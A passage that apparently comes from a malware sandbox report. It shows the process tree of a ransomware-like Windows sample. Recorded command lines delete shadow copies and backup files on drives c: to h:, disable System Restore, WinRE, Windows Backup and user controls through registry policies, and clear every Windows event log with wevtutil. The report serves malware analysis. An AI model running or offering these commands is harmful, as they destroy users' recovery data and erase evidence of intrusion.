  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:948
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:224
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
  2⤵
  PID:728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
  2⤵
  PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
  2⤵
  PID:324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
  2⤵
  PID:560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
  2⤵
  PID:1072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
  2⤵
  PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del %0
  2⤵
  PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
  2⤵
  PID:1348
- - C:\Windows\system32\attrib.exe
    attrib +h +s hrmlog2
    3⤵
    - Views/modifies file attributes
    PID:1788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
  2⤵
  PID:1728
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\hrmlog2
    3⤵
    - Views/modifies file attributes
    PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:812
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:1516
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:1144
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:780
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:1768
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:1428
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:1076
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:1328
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1176
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
  2⤵
  PID:1340
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
    3⤵
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:1988
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:304
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:1820
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
  2⤵
  PID:2004
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
    3⤵
    PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:820
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:1136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
  2⤵
  PID:1780
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
    3⤵
    PID:1312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:220
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:212
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:1688
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:664
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:224
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:1168
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:560
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:1072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1588
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1792
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:900
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:792
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1364
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:684
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:568
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:1996
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  2⤵
  PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:1076
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe el
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DebugChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Media Center"
    3⤵
    - Clears Windows event logs
    PID:728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    PID:1428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    - Clears Windows event logs
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    - Clears Windows event logs
    PID:728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    - Clears Windows event logs
    PID:324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    - Clears Windows event logs
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    - Clears Windows event logs
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:1428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
    3⤵
    - Clears Windows event logs
    PID:728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:1428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:204
